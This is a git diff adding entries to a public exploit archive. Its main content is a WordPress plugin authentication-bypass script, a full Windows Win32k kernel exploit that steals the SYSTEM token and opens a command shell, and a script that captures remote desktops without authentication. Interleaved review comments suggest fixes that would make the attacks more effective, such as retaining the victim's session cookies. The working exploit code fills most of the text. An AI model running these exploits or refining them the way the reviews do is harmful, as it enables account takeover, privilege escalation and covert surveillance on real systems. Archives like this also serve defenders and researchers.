response = requests.post(endpoint, files=files, timeout=10) + + if response.status_code == 200 and '"success":true' in response.text: + cprint("[✓] Exploit successful! Authentication bypass achieved.", "green") + cprint("[!] Check your session/cookies - you may now be authenticated as the target user.\n", "green") + print("Server Response:") + print(response.text) + else: + cprint("[-] Exploit failed or invalid nonce/member_id.", "red") + print("Server Response:") + print(response.text) + except requests.exceptions.RequestException as e: + cprint(f"[!] 
Request failed: {e}", "red") + +def main(): + banner() + + parser = argparse.ArgumentParser(description="CVE-2025-2594 - WordPress Plugin Authentication Bypass") + parser.add_argument("target", help="Base target URL (e.g., http://localhost)") + parser.add_argument("member_id", help="Target user ID (usually 1 for admin)") + parser.add_argument("nonce", help="_confirm_payment_nonce value from registration page") + + args = parser.parse_args() + + exploit(args.target, args.member_id, args.nonce) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/windows/local/52301.c b/exploits/windows/local/52301.c new file mode 100644 index 000000000..95a2a6109 --- /dev/null +++ b/exploits/windows/local/52301.c 
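Review bot: On success the script tells the user to "Check your session/cookies", but `exploit()` issues a one-off `requests.post(...)` with no `Session` and never prints the response's `Set-Cookie` headers, so whatever authentication cookies an `auto_login` response sets are discarded and nothing usable is left behind; print `response.cookies` (or `response.headers.get("Set-Cookie")`) and, if the intent is to act as the target user, keep a `requests.Session()` for follow-up requests. `urljoin(target_url, "/wp-admin/admin-ajax.php")` discards any subpath in the target (`http://host/blog` becomes `http://host/wp-admin/admin-ajax.php`), so sites installed under a prefix are never hit; `target_url.rstrip("/") + "/wp-admin/admin-ajax.php"` is what the help text implies. The success test `'"success":true' in response.text` is a substring match — use `response.json().get("success") is True` so a nested field cannot produce a false positive. The `nonce` argument is described only as coming from the registration page; a comment on how it is obtained without credentials would let a reader judge the precondition, since that is what makes this an authentication bypass rather than a CSRF. `sys` is imported and unused.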
@@ -0,0 +1,623 @@ +# Exploit Title: Microsoft Windows Server 2016 - Win32k Elevation of +Privilege +# Date: 2025-05-19 +# Exploit Author: Milad Karimi (Ex3ptionaL) +# Contact: miladgrayhat@gmail.com +# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL +# Country: United Kingdom +# CVE : CVE-2023-29336 + + + + +#include +#include +#include + +#define IDM_MYMENU 101 +#define IDM_EXIT 102 +#define IDM_DISABLE 0xf120 +#define IDM_ENABLE 104 +#define EPROCESS_UNIQUE_PROCESS_ID_OFFSET 0x440 +#define EPROCESS_ACTIVE_PROCESS_LINKS_OFFSET 0x448 +#define EPROCESS_TOKEN_OFFSET 0x4b8 + +typedef DWORD64(NTAPI* NtUserEnableMenuItem)(HMENU hMenu, UINT +uIDEnableItem, UINT uEnable); + +typedef DWORD64(NTAPI* NtUserSetClassLongPtr)(HWND a1, unsigned int a2, +unsigned __int64 a3, unsigned int a4); +typedef DWORD64(NTAPI* NtUserCreateAcceleratorTable)(void* Src, int a2); +typedef DWORD64(NTAPI* fnNtUserConsoleControl)(int nConsoleCommand, PVOID, +int nConsoleInformationLength); + + +NtUserSetClassLongPtr g_NtUserSetClassLongPtr = NULL; +NtUserEnableMenuItem g_NtUserEnableMenuItem = NULL; +NtUserCreateAcceleratorTable g_NtUserCreateAcceleratorTable = NULL; +fnNtUserConsoleControl g_pfnNtUserConsoleControl = nullptr; +LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM +lParam); +int syytem(); +typedef struct _SHELLCODE { + DWORD reserved; + DWORD pid; + DWORD off_THREADINFO_ppi; + DWORD off_EPROCESS_ActiveLink; + DWORD off_EPROCESS_Token; + BOOL bExploited; + BYTE pfnWindProc[]; +} SHELLCODE, * PSHELLCODE; +struct tagMENU +{ + ULONG64 field_0; + ULONG64 field_8; + ULONG64 field_10; + ULONG64 field_18; + ULONG64 field_20; + PVOID obj28; + DWORD field_30; + DWORD flag1; + DWORD flag2; + DWORD cxMenu; + DWORD cyMenu; + ULONG64 field_48; + PVOID rgItems; + ULONG64 field_58; // + 0x58 + ULONG64 field_60; + ULONG64 field_68; + ULONG64 field_70; + ULONG64 field_78; + ULONG64 field_80; + ULONG64 field_88; + ULONG64 field_90; + PVOID ref; // + 0x98 +}; +struct MyData +{ + 
BYTE name[0x96]; +}; +tagMENU* g_pFakeMenu = 0; +static PSHELLCODE pvShellCode = NULL; +HMENU hSystemMenu; +HMENU hMenu; +HMENU hSubMenu; +HMENU hAddedSubMenu; +HMENU hMenuB; +PVOID MENU_add = 0; +DWORD flag = 0; +UINT iWindowCount = 0x100; +HWND HWND_list[0x300]; +HWND HWND_list1[0x20]; +HMENU HMENUL_list[0x300]; +int Hwnd_num = 0; +int Hwnd_num1 = 0; +ULONGLONG HWND_add = 0; +ULONGLONG GS_off = 0; +WORD max = 0; + +static PULONGLONG ptagWNDFake = NULL; +static PULONGLONG ptagWNDFake1 = NULL; +static PULONGLONG ptagWNDFake2 = NULL; + +static PULONGLONG GS_hanlde = NULL; + +static PULONGLONG HWND_class = NULL; + + +struct ThreadParams { + int threadId; + int numLoops; +}; + + +static unsigned long long GetGsValue(unsigned long long gsValue) +{ + return gsValue; +} +PVOID +GetMenuHandle(HMENU menu_D) +{ + int conut = 0; + PVOID HANDLE = 0; + PBYTE add = 0; + WORD temp = 0; + DWORD offset = 0xbd688; + HMODULE hModule = LoadLibraryA("USER32.DLL"); + + PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, "IsMenu"); + ULONGLONG par1 = 0; + DWORD par2 = 0; + memcpy((VOID*)&par1, (char*)((ULONGLONG)hModule + offset), 0x08); + memcpy((VOID*)&par2, (char*)((ULONGLONG)hModule + offset + 0x08), 0x02); + + add = (PBYTE)(par1 + 0x18 * (WORD)menu_D); + + if (add) + { + HANDLE = *(PVOID*)add; + } + else + { + HANDLE = 0; + } + HANDLE= (PVOID*)((ULONGLONG)HANDLE - GS_off+0x20); + return *(PVOID*)HANDLE; + +} + +PVOID +xxGetHMValidateHandle(HMENU menu_D, DWORD type_hanlde) +{ + int conut = 0; + PVOID HANDLE = 0; + PBYTE add = 0; + WORD temp = 0; + DWORD offset = 0xbd688; + HMODULE hModule = LoadLibraryA("USER32.DLL"); + + PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, "IsMenu"); + ULONGLONG par1 = 0; + DWORD par2 = 0; + memcpy((VOID*)&par1, (char*)((ULONGLONG)hModule + offset), 0x08); + memcpy((VOID*)&par2, (char*)((ULONGLONG)hModule + offset + 0x08), 0x02); + + temp = (ULONGLONG)menu_D >> 16; + add = (PBYTE)(par1 + 0x18 * (WORD)menu_D); + if (add) + { + HANDLE = *(PVOID*)add; + } + 
else + { + HANDLE = 0; + } + HANDLE = (PVOID*)((ULONGLONG)HANDLE - GS_off + 0x20); + return *(PVOID*)HANDLE; + +} + + +static +VOID +xxReallocPopupMenu(VOID) +{ + for (INT i = 0; i < 0x8; i++) + { + WNDCLASSEXW Class = { 0 }; + WCHAR szTemp[0x100] = { 0 }; + HWND hwnd = NULL; + wsprintfW(szTemp, +L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@A%d", +i); + Class.cbSize = sizeof(WNDCLASSEXA); + Class.lpfnWndProc = DefWindowProcW; + Class.cbWndExtra = 0; + Class.hInstance = GetModuleHandleA(NULL); + Class.lpszMenuName = NULL; + Class.lpszClassName = szTemp; + if (!RegisterClassExW(&Class)) + { + continue; + } + } + +} +VOID +createclass(VOID) +{ + WCHAR szTemp[0x100] = { 0 }; + for (INT i = 9; i < 29; i++) + { + WNDCLASSEXW Class = { 0 }; + + HWND hwnd = NULL; + wsprintfW(szTemp, L"A@A%d", i); + Class.cbSize = sizeof(WNDCLASSEXA); + Class.lpfnWndProc = DefWindowProcW; + Class.cbWndExtra = 0x20; + Class.hInstance = GetModuleHandleA(NULL); + Class.lpszMenuName = NULL; + Class.lpszClassName = szTemp; + Class.cbClsExtra = 0x1a0; + if (!RegisterClassExW(&Class)) + { + continue; + } + } + + for (INT i = 9; i < 29; i++) + { + wsprintfW(szTemp, L"A@A%d", i); + HWND_list1[i]=CreateWindowEx(NULL, szTemp, NULL, WS_VISIBLE, 0, 0, +0, 0, NULL,NULL, NULL, NULL); + + + } + +} + +ULONG64 Read64(ULONG64 address) +{ + MENUBARINFO mbi = { 0 }; + mbi.cbSize = sizeof(MENUBARINFO); + + g_pFakeMenu->rgItems = PVOID(address - 0x48); + GetMenuBarInfo(HWND_list[max+1], OBJID_MENU, 1, &mbi); + + return (unsigned int)mbi.rcBar.left + ((ULONGLONG)mbi.rcBar.top << 32); +} +void exploit() +{ + for (int i = 0; i < 0x20; i++) + { + + ULONG64 pmenu = SetClassLongPtr(HWND_list1[i], 0x270, +(LONG_PTR)g_pFakeMenu); + if (pmenu != 0) + { + Hwnd_num = i; + MENUBARINFO mbi = { 0 }; + mbi.cbSize = sizeof(MENUBARINFO); + + + + } + } + + + // Token stealing + ULONG64 p = Read64(HWND_add +0x250+ 0x10); // USER_THREADINFO + p = Read64(p); //THREADINFO + p = Read64(p + 0x220); // 
(PROCESSINFO) + + ULONG64 eprocess = p; + printf("Current EPROCESS = %llx\n", eprocess); + p = Read64(p + 0x2f0); + + do { + + p = Read64(p + 0x08); + ULONG64 pid = Read64(p - 0x08); + if (pid == 4) { + + ULONG64 pSystemToken = Read64(p + 0x68); + printf("pSys/tem Token = %llx \n", pSystemToken); + + HWND_class = (PULONGLONG)((PBYTE)0x303000); + HWND_class[8] = eprocess + 0x290; + HWND_class[12] = 0x100; + HWND_class[20] = 0x303010; + + ULONG64 ret_add = SetClassLongPtr(HWND_list1[Hwnd_num], 0x250 + +0x98 - 0xa0, (LONG_PTR)HWND_class); + SetClassLongPtr(HWND_list[max + 1], 0x28, pSystemToken); + ret_add = SetClassLongPtr(HWND_list1[Hwnd_num], 0x250 + 0x98 - +0xa0, (LONG_PTR)ret_add); + + break; + } + } while (p != eprocess); + syytem(); +} + + +void buildmem() +{ + + WORD max_handle = 0; + pvShellCode = (PSHELLCODE)VirtualAlloc((PVOID)0x300000, 0x10000, +MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + if (pvShellCode == NULL) + { + return; + } + ZeroMemory(pvShellCode, 0x10000); + + + + ptagWNDFake = (PULONGLONG)((PBYTE)0x304140); + ptagWNDFake[0] = (ULONGLONG)0x304140; + + ptagWNDFake[2] = (ULONGLONG)0x304140 + 0x10; + + + + ptagWNDFake[6] = (ULONGLONG)0x304140; + ptagWNDFake[8] = 0x305300; + + ptagWNDFake[11] = (ULONGLONG)MENU_add; + ptagWNDFake[68] = (ULONGLONG)0x304140 + 0x230; + ptagWNDFake[69] = (ULONGLONG)0x304140 + 0x28; + ptagWNDFake[70] = (ULONGLONG)0x304140 + 0x30; + ptagWNDFake[71] = (ULONGLONG)0x000004; + + + ptagWNDFake1 = (PULONGLONG)((PBYTE)0x305300); + ptagWNDFake1[1] = (ULONGLONG)0x11; + ptagWNDFake1[2] = (ULONGLONG)0x305320; + ptagWNDFake1[6] = (ULONGLONG)0x1000000000020000; + ptagWNDFake1[8] = (ULONGLONG)0x00000000029d0000; + ptagWNDFake1[11] = (ULONGLONG)HWND_add + 0x63 - 0x120; + + + ptagWNDFake1[14] = (ULONGLONG)0x306500; + ptagWNDFake1[16] = (ULONGLONG)305400; + + + ptagWNDFake2 = (PULONGLONG)((PBYTE)0x306500); + ptagWNDFake1[11] = (ULONGLONG)0x306600; + + + + WNDCLASSEX WndClass = { 0 }; + WndClass.cbSize = sizeof(WNDCLASSEX); + 
WndClass.lpfnWndProc = DefWindowProc; + WndClass.style = CS_VREDRAW | CS_HREDRAW; + WndClass.cbWndExtra = 0xe0; + WndClass.hInstance = NULL; + WndClass.lpszMenuName = NULL; + WndClass.lpszClassName = L"NormalClass"; + + RegisterClassEx(&WndClass); + + for (int i = 0; i < 0x200; i++) + { + HMENUL_list[i] = CreateMenu(); + } + for (int i = 0; i < 0x100; i++) + { + HWND_list[i] = CreateWindowEx(NULL, L"NormalClass", NULL, +WS_VISIBLE, 0, 0, 0, 0, NULL, HMENUL_list[i], NULL, NULL); + + } + for (int i = 0; i < 0x100; i++) + { + + + SetWindowLongPtr(HWND_list[i], 0x58, (LONG_PTR)0x0002080000000000); + + SetWindowLongPtr(HWND_list[i], 0x80, (LONG_PTR)0x0000303030000000); + + } + + + for (int i = 0x20; i < 0x60; i++) + { + if ((ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2], +0x01)- (ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2 - 1], +0x01)== 0x250) + { + if ((ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2 + +1], 0x01)-(ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2], 0x01) +== 0x250) + { + HWND_add = +(ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i*2], 0x01); + max = i * 2; + break; + } + } + if (i == 0x5f) + { + HWND_add = 0; + } + + } + + ptagWNDFake1[11] = (ULONGLONG)HWND_add + 0x63 - 0x120; + + + DestroyWindow(HWND_list[max]); + + createclass(); + + + + // Create a fake spmenu + PVOID hHeap = (PVOID)0x302000; + + g_pFakeMenu = (tagMENU*)(PVOID)0x302000; + g_pFakeMenu->ref = (PVOID)0x302300; + *(PULONG64)g_pFakeMenu->ref = (ULONG64)g_pFakeMenu; + // cItems = 1 + g_pFakeMenu->obj28 = (PVOID)0x302200; + *(PULONG64)((PBYTE)g_pFakeMenu->obj28 + 0x2C) = 1; + // rgItems + g_pFakeMenu->rgItems = (PVOID)0x304000; + // cx / cy must > 0 + g_pFakeMenu->flag1 = 1; + g_pFakeMenu->flag2 = 1; + g_pFakeMenu->cxMenu = 1; + g_pFakeMenu->cyMenu = 1; + + + // + +} +int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR +lpCmdLine, int nCmdShow) +{ + ULONGLONG gsValue = 0; + unsigned char shellcode[] = 
+"\x65\x48\x8B\x04\x25\x30\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\xc3"; + + LPVOID executableMemory = VirtualAlloc(NULL, sizeof(shellcode), +MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + if (executableMemory == NULL) { + return 1; + } + memcpy(executableMemory, shellcode, sizeof(shellcode)); + + gsValue = ((ULONGLONG(*)())executableMemory)(); + gsValue = gsValue + 0x800; + GS_hanlde = (PULONGLONG)(PBYTE)gsValue; + GS_off = GS_hanlde[5]; + + char str[0xb8] = ""; + memset(str, 0x41, 0xa8); + g_NtUserEnableMenuItem = +(NtUserEnableMenuItem)GetProcAddress(GetModuleHandleA("win32u.dll"), +"NtUserEnableMenuItem"); + g_NtUserSetClassLongPtr = +(NtUserSetClassLongPtr)GetProcAddress(GetModuleHandleA("win32u.dll"), +"NtUserSetClassLongPtr"); + g_NtUserCreateAcceleratorTable = +(NtUserCreateAcceleratorTable)GetProcAddress(GetModuleHandleA("win32u.dll"), +"NtUserCreateAcceleratorTable"); + g_pfnNtUserConsoleControl = +(fnNtUserConsoleControl)GetProcAddress(GetModuleHandleA("win32u.dll"), +"NtUserConsoleControl"); + + WNDCLASS wc = { 0 }; + + wc.lpfnWndProc = WndProc; + wc.hInstance = hInstance; + wc.lpszClassName = TEXT("EnableMenuItem"); + + RegisterClass(&wc); + + HWND hWnd = CreateWindow( + wc.lpszClassName, + TEXT("EnableMenuItem"), + WS_OVERLAPPEDWINDOW, + CW_USEDEFAULT, + CW_USEDEFAULT, + 400, 300, + NULL, + NULL, + hInstance, + NULL + ); + + if (!hWnd) return FALSE; + + /// + + + hSystemMenu = GetSystemMenu(hWnd, FALSE); + + hSubMenu = CreatePopupMenu(); + MENU_add = GetMenuHandle(hSubMenu); + hMenuB = CreateMenu(); + + buildmem(); + if (HWND_add == 0) + { + return 0; + } + + + AppendMenu(hSubMenu, MF_STRING, 0x2061, TEXT("0")); + AppendMenu(hSubMenu, MF_STRING, 0xf060, TEXT("1")); + + DeleteMenu(hSystemMenu, SC_CLOSE, MF_BYCOMMAND); + + AppendMenu(hMenuB, MF_POPUP, (UINT_PTR)hSubMenu, L"Menu A"); + + AppendMenu(hSystemMenu, MF_POPUP, (UINT_PTR)hMenuB, L"Menu B"); + + + + ShowWindow(hWnd, nCmdShow); + UpdateWindow(hWnd); + + flag = 1; + 
g_NtUserEnableMenuItem(hSystemMenu, 0xf060, 0x01); + + exploit(); + + MSG msg = { 0 }; + + while (GetMessage(&msg, NULL, 0, 0)) + { + TranslateMessage(&msg); + DispatchMessage(&msg); + } + + return (int)msg.wParam; +} + +LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM +lParam) +{ + switch (message) + { + case WM_DESTROY: + PostQuitMessage(0); + return 0; + case 0xae: + switch (wParam) + { + case 0x1000: + if (flag) + { + int itemCount = GetMenuItemCount(hMenuB); + + for (int i = itemCount - 1; i >= 0; i--) { + RemoveMenu(hMenuB, i, MF_BYPOSITION); + } + DestroyMenu(hSubMenu); + xxReallocPopupMenu(); + } + case 0x1001: + if (flag) + { + int itemCount = GetMenuItemCount(hMenuB); + + for (int i = itemCount - 1; i >= 0; i--) { + RemoveMenu(hMenuB, i, MF_BYPOSITION); + } + DestroyMenu(hSubMenu); + xxReallocPopupMenu(); + } + + return 0; + } + break; + + + } + + return DefWindowProc(hWnd, message, wParam, lParam); +} +int syytem() +{ + SECURITY_ATTRIBUTES sa; + HANDLE hRead, hWrite; + byte buf[40960] = { 0 }; + STARTUPINFOW si; + PROCESS_INFORMATION pi; + DWORD bytesRead; + RtlSecureZeroMemory(&si, sizeof(si)); + RtlSecureZeroMemory(&pi, sizeof(pi)); + RtlSecureZeroMemory(&sa, sizeof(sa)); + int br = 0; + sa.nLength = sizeof(SECURITY_ATTRIBUTES); + sa.lpSecurityDescriptor = NULL; + sa.bInheritHandle = TRUE; + if (!CreatePipe(&hRead, &hWrite, &sa, 0)) + { + return -3; + } + + si.cb = sizeof(STARTUPINFO); + GetStartupInfoW(&si); + si.hStdError = hWrite; + si.hStdOutput = hWrite; + si.wShowWindow = SW_HIDE; + si.lpDesktop = L"WinSta0\\Default"; + si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; + wchar_t cmd[4096] = { L"cmd.exe" }; + + if (!CreateProcessW(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &si, +&pi)) + { + CloseHandle(hWrite); + CloseHandle(hRead); + printf("[!] CreateProcessW Failed![%lx]\n", GetLastError()); + return -2; + } + CloseHandle(hWrite); + +} \ No newline at end of file 
diff --git a/exploits/windows/remote/52300.py b/exploits/windows/remote/52300.py
new file mode 100755
index 000000000..82f027873
--- /dev/null
+++ b/exploits/windows/remote/52300.py
@@ -0,0 +1,61 @@
+# Exploit Title: Windows 2024.15 - Unauthenticated Desktop Screenshot Capture
+# Date: 2025-05-19
+# Exploit Author: Chokri Hammedi
+# Vendor Homepage: https://rs.ltd
+# Software Link: https://rs.ltd/latest.php?os=win
+# Version: 2024.15
+# Tested on: Windows 10/11 with Remote for Windows (helper)
+
+'''
+Description:
+- Exploits the getScreenshot API endpoint in Remote for Windows helper
+service
+- Works when "Allow unknown devices" setting is enabled (default: disabled)
+- Captures current desktop including login screens (SYSTEM-level access)
+
+Vulnerable Component:
+- /api/getScreenshot endpoint with missing authentication checks
+
+
+# Identification:
+nmap -p- -T4 --script ssl-cert
+Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US
+'''
+
+#!/usr/bin/env python3
+
+import requests
+import sys
+from urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+
+def capture_screenshot(ip, port, output_file):
+ try:
+ response = requests.get(
+ f"https://{ip}:{port}/api/getScreenshot",
+ headers={
+ "X-ClientToken": "exploit",
+ "X-HostName": "attacker-pc",
+ "X-HostFullModel": "exploit-device"
+ },
+ verify=False,
+ timeout=15
+ )
+ if response.status_code == 200 and
+response.content.startswith(b'\xff\xd8'):
+ with open(output_file, 'wb') as f:
+ f.write(response.content)
+ print(f"[+] Saved: {output_file}")
+ return True
+ print(f"[-] Failed: HTTP {response.status_code}")
+ return False
+ except Exception as e:
+ print(f"[-] Error: {str(e)}")
+ return False
+
+if __name__ == "__main__":
+ if len(sys.argv) < 4:
+ print(f"Usage: {sys.argv[0]} ")
+ sys.exit(1)
+ sys.exit(0 if capture_screenshot(sys.argv[1], sys.argv[2], sys.argv[3])
+else 1)
\ No newline at end of file
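Review bot: `#!/usr/bin/env python3` is placed after the header comments and the docstring, where it is just another comment, so the 100755 mode on this new file does not give it a working interpreter line; move it to line 1. The header block lists Description and Vulnerable Component but no remediation, even though it already states the request only works with "Allow unknown devices" enabled, so add `Mitigation: leave "Allow unknown devices" disabled (the default).` below `Vulnerable Component:`. In capture_screenshot, `except Exception as e` also catches failures from opening or writing output_file and reports them under the same "[-] Error" message; `except (requests.RequestException, OSError) as e:` keeps the two cases distinguishable and lets genuinely unexpected errors surface.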
diff --git a/files_exploits.csv b/files_exploits.csv
index 937480489..29175d14f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5550,6 +5550,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 33254,exploits/java/webapps/33254.txt,"IBM Lotus Connections 2.0.1 - 'simpleSearch.do' Cross-Site Scripting",2009-09-23,IBM,webapps,java,,2009-09-23,2014-05-09,1,CVE-2009-3469;OSVDB-58320,,,,,https://www.securityfocus.com/bid/36513/info
 31438,exploits/java/webapps/31438.txt,"IBM Rational ClearQuest 7.0 - Multiple Cross-Site Scripting Vulnerabilities",2008-03-19,sasquatch,webapps,java,,2008-03-19,2014-02-06,1,CVE-2007-4592;OSVDB-43356,,,,,https://www.securityfocus.com/bid/28296/info
 36299,exploits/java/webapps/36299.txt,"Infoblox NetMRI 6.2.1 - Admin Login Page Multiple Cross-Site Scripting Vulnerabilities",2011-11-11,"Jose Carlos de Arriba",webapps,java,,2011-11-11,2015-03-06,1,,,,,,https://www.securityfocus.com/bid/50646/info
+52304,exploits/java/webapps/52304.py,"Java-springboot-codebase 1.1 - Arbitrary File Read",2025-05-25,d3sca,webapps,java,,2025-05-25,2025-05-25,0,CVE-2025-46822,,,,,
 36971,exploits/java/webapps/36971.txt,"JavaBB 0.99 - 'userId' Cross-Site Scripting",2012-03-18,sonyy,webapps,java,,2012-03-18,2015-05-09,1,,,,,,https://www.securityfocus.com/bid/52545/info
 36828,exploits/java/webapps/36828.txt,"JaWiki - 'versionNo' Cross-Site Scripting",2012-02-17,sonyy,webapps,java,,2012-02-17,2015-04-27,1,,,,,,https://www.securityfocus.com/bid/52060/info
 37033,exploits/java/webapps/37033.txt,"JBMC Software DirectAdmin 1.403 - 'domain' Cross-Site Scripting",2012-04-02,"Dawid Golak",webapps,java,,2012-04-02,2015-05-17,1,,,,,,https://www.securityfocus.com/bid/52845/info
@@ -10425,6 +10426,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 52191,exploits/multiple/hardware/52191.py,"ZTE ZXHN H168N 3.1 - Remote Code Execution (RCE) via authentication bypass",2025-04-14,"tasos meletlidis",hardware,multiple,,2025-04-14,2025-04-14,0,,,,,,
 11651,exploits/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.9p21/1.7.2p4 - Local Privilege Escalation",2010-03-07,kingcope,local,multiple,,2010-03-06,,1,,,,,,
 51849,exploits/multiple/local/51849.py,"A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc",2024-03-03,"George Washington",local,multiple,,2024-03-03,2024-03-03,0,,,,,,
+52306,exploits/multiple/local/52306.txt,"ABB Cylon Aspect Studio 3.08.03 - Binary Planting",2025-05-25,LiquidWorm,local,multiple,,2025-05-25,2025-05-25,0,CVE-2024-13946,,,,,
 38835,exploits/multiple/local/38835.py,"abrt (Centos 7.1 / Fedora 22) - Local Privilege Escalation",2015-12-01,rebel,local,multiple,,2015-12-01,2018-11-17,1,CVE-2015-5287;CVE-2015-5273;OSVDB-130747;OSVDB-130746;OSVDB-130745;OSVDB-130609,,,http://www.exploit-db.com/screenshots/idlt39000/screen-shot-2015-12-03-at-40702-pm.png,,
 30666,exploits/multiple/local/30666.txt,"ACE Stream Media 2.1 - 'acestream://' Format String",2014-01-03,LiquidWorm,local,multiple,,2014-01-07,2014-01-07,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5165.php
 19139,exploits/multiple/local/19139.py,"Adobe Illustrator CS5.5 - Memory Corruption",2012-06-14,"Felipe Andres Manzano",local,multiple,,2012-06-14,2012-06-14,0,OSVDB-81754;CVE-2012-0780,,,,,
@@ -10619,6 +10621,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 22327,exploits/multiple/remote/22327.txt,"3Com SuperStack 3 Firewall - Content Filter Bypassing",2003-03-05,bit_logic,remote,multiple,,2003-03-05,2012-10-28,1,,,,,,https://www.securityfocus.com/bid/7021/info
 31921,exploits/multiple/remote/31921.txt,"3D-FTP 8.01 - 'LIST' / 'MLSD' Directory Traversal",2008-06-16,"Tan Chew Keong",remote,multiple,,2008-06-16,2014-02-26,1,CVE-2008-2822;OSVDB-46155,,,,,https://www.securityfocus.com/bid/29749/info
 32167,exploits/multiple/remote/32167.txt,"8E6 Technologies R3000 - Host Header Internet Filter Security Bypass",2008-08-05,nnposter,remote,multiple,,2008-08-05,2014-03-11,1,CVE-2008-3494;OSVDB-47517,,,,,https://www.securityfocus.com/bid/30541/info
+52305,exploits/multiple/remote/52305.py,"ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation",2025-05-25,LiquidWorm,remote,multiple,,2025-05-25,2025-05-25,0,CVE-n/a,,,,,
 25019,exploits/multiple/remote/25019.txt,"ABC2MIDI 2004-12-04 - Multiple Stack Buffer Overflow Vulnerabilities",2004-12-15,"Limin Wang",remote,multiple,,2004-12-15,2013-04-30,1,CVE-2004-1256;OSVDB-12426,,,,,https://www.securityfocus.com/bid/12019/info
 25018,exploits/multiple/remote/25018.txt,"ABC2MTEX 1.6.1 - Process ABC Key Field Buffer Overflow",2004-12-15,"Limin Wang",remote,multiple,,2004-12-15,2013-04-30,1,,,,,,https://www.securityfocus.com/bid/12018/info
 32382,exploits/multiple/remote/32382.txt,"Accellion File Transfer Appliance Error Report Message - Open Email Relay",2008-09-15,"Eric Beaulieu",remote,multiple,,2008-09-15,2014-03-20,1,CVE-2008-7012;OSVDB-48242,,,,,https://www.securityfocus.com/bid/31178/info
@@ -10994,6 +10997,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 19903,exploits/multiple/remote/19903.txt,"Gossamer Threads DBMan 2.0.4 - DBMan Information Leakage",2000-05-05,"Black Watch Labs",remote,multiple,,2000-05-05,2012-07-17,1,CVE-2000-0381;OSVDB-306,,,,,https://www.securityfocus.com/bid/1178/info
 39292,exploits/multiple/remote/39292.pl,"Granding MA300 - Traffic Sniffing Man In The Middle Fingerprint PIN Disclosure",2014-08-26,"Eric Sesterhenn",remote,multiple,,2014-08-26,2018-01-11,1,CVE-2014-5380;OSVDB-110460,,,,,https://www.securityfocus.com/bid/69390/info
 39293,exploits/multiple/remote/39293.pl,"Granding MA300 - Weak Pin Encryption Brute Force",2014-08-26,"Eric Sesterhenn",remote,multiple,,2014-08-26,2016-01-22,1,CVE-2014-5381;OSVDB-110456,,,,,https://www.securityfocus.com/bid/69390/info
+52303,exploits/multiple/remote/52303.py,"Grandstream GSD3710 1.0.11.13 - Stack Buffer Overflow",2025-05-25,Pepelux,remote,multiple,,2025-05-25,2025-05-25,0,CVE-2022-2070,,,,,
 33203,exploits/multiple/remote/33203.txt,"GreenSQL Firewall 0.9.x - WHERE Clause Security Bypass",2009-09-02,"Johannes Dahse",remote,multiple,,2009-09-02,2014-05-06,1,CVE-2008-6992;OSVDB-48910,,,,,https://www.securityfocus.com/bid/36209/info
 38049,exploits/multiple/remote/38049.txt,"Greenstone - Multiple Vulnerabilities",2012-11-23,AkaStep,remote,multiple,,2012-11-23,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/56662/info
 31912,exploits/multiple/remote/31912.txt,"GSC Client 1.00 2067 - Privilege Escalation",2008-06-14,"Michael Gray",remote,multiple,,2014-04-09,2014-04-09,0,CVE-2008-7170;OSVDB-53482,,,,,https://www.securityfocus.com/bid/29718/info
@@ -12508,6 +12512,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49252,exploits/multiple/webapps/49252.txt,"WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download",2020-12-14,Wadeek,webapps,multiple,,2020-12-14,2020-12-14,0,,,,,,
 33937,exploits/multiple/webapps/33937.txt,"WordPress Plugin TYPO3 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting",2010-05-05,MustLive,webapps,multiple,,2010-05-05,2016-09-26,1,,,,,,https://www.securityfocus.com/bid/39926/info
 52137,exploits/multiple/webapps/52137.txt,"WordPress User Registration & Membership Plugin 4.1.1 - Unauthenticated Privilege Escalation",2025-04-08,"Al Baradi Joy",webapps,multiple,,2025-04-08,2025-04-08,0,,,,,,
+52302,exploits/multiple/webapps/52302.py,"WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass",2025-05-25,"Mohammed Idrees Banyamer",webapps,multiple,,2025-05-25,2025-05-25,0,CVE-2025-2594,,,,,
